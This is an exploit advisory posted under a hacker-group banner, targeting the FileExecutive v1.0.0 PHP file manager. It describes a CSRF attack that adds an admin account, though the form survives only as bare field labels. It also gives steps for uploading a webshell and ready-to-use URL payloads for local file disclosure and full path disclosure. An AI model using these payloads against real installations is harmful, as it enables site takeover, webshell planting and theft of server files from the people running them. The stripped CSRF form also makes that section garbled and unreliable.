============================================================================== [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ] ============================================================================== [»] FileExecutive Multiple Vulnerabilities ============================================================================== [»] Script: [ FileExecutive v1.0.0 ] [»] Language: [ PHP ] [»] Site page: [ FileExecutive is a web-based file manager written in PHP. ] [»] Download: [ http://sourceforge.net/projects/fileexecutive/ ] [»] Founder: [ ViRuSMaN ] [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ] [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploits ]=== Add/Edit Admin CSRF: FileExecutive Remote Add Admin Exploit [By:MvM]
Add A user
Username:
Password:
Name:
Root Directory:
Max Upload Size:
Group: Use Group permissions?Yes:No: Is user Admin?Yes:No:
Permissions Create File Create Folder Upload Rename Delete Edit Download Chmod Move Shell Upload: [»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability Local File Disclosure: [»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability Full Path Disclosure: [»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability Author: ViRuSMaN <- ###########################################################################